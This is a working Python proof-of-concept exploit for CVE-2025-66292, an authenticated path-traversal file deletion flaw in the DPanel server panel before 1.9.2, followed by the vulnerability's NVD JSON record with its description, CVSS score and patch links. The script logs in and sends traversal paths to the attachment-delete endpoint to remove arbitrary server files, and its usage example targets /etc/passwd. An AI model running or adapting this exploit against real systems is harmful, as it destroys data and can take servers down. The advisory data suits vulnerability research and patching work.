CVE-2025-66292

import requests import sys # CVE-2025-66292 DPanel Arbitrary File Deletion PoC # Target: DPanel < 1.9.2 # Endpoint: /api/common/attach/delete def delete_file(target_url, username, password, file_to_delete): """ Delete arbitrary file on DPanel server via path traversal Args: target_url: Base URL of DPanel (e.g., http://target.com:22222) username: Valid username for authentication password: Password for the user file_to_delete: File path to delete (can use ../ for traversal) """ # Step 1: Login to get session login_url = f"{target_url}/api/user/login" login_data = { "username": username, "password": password } session = requests.Session() try: login_response = session.post(login_url, json=login_data, timeout=10) if login_response.status_code != 200: print(f"[-] Login failed with status code: {login_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error during login: {e}") return False # Step 2: Exploit path traversal to delete arbitrary file delete_url = f"{target_url}/api/common/attach/delete" delete_data = { "path": file_to_delete # e.g., "../../../etc/passwd" or "../../../var/log/syslog" } try: delete_response = session.post(delete_url, json=delete_data, timeout=10) if delete_response.status_code == 200: result = delete_response.json() if result.get('code') == 0: print(f"[+] Successfully deleted: {file_to_delete}") return True else: print(f"[-] Delete failed: {result.get('message')}") return False else: print(f"[-] Request failed with status code: {delete_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error during delete: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-66292.py <target_url> <username> <password> <file_to_delete>") print("Example: python cve-2025-66292.py http://target.com:22222 admin admin123 '../../../etc/passwd'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] file_path = sys.argv[4] print(f"[*] Target: {target}") print(f"[*] Target file: {file_path}") delete_file(target, user, pwd, file_path)

{"cve": {"id": "CVE-2025-66292", "sourceIdentifier": "[email protected]", "published": "2026-01-15T17:16:04.570", "lastModified": "2026-03-12T18:07:07.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface. Authenticated users can delete arbitrary files on the server via path traversal. When a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function within the app/common/http/controller/attach.go file. The path parameter submitted by the user is directly passed to storage.Local{}.GetSaveRealPath and subsequently to os.Remove without proper sanitization or checking for path traversal characters (../). And the helper function in common/service/storage/local.go uses filepath.Join, which resolves ../ but does not enforce a chroot/jail. This vulnerability is fixed in 1.9.2."}, {"lang": "es", "value": "DPanel es un panel de gestión de servidor de código abierto escrito en Go. Anterior a 1.9.2, DPanel tiene una vulnerabilidad de eliminación arbitraria de archivos en la interfaz /api/common/attach/delete. Los usuarios autenticados pueden eliminar archivos arbitrarios en el servidor mediante salto de ruta. Cuando un usuario inicia sesión en el backend administrativo, esta interfaz puede usarse para eliminar archivos. La vulnerabilidad reside en la función Delete dentro del archivo app/common/http/controller/attach.go. El parámetro de ruta enviado por el usuario se pasa directamente a storage.Local{}.GetSaveRealPath y, posteriormente, a os.Remove sin una sanitización adecuada o sin verificar caracteres de salto de ruta (../). Y la función auxiliar en common/service/storage/local.go utiliza filepath.Join, que resuelve ../ pero no impone un chroot/jail. Esta vulnerabilidad está corregida en 1.9.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dpanel:dpanel:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.9.2", "matchCriteriaId": "2B472AD9-9206-4EA4-A7BE-3FFA42B28FE9"}]}]}], "references": [{"url": "https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/donknap/dpanel/releases/tag/v1.9.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}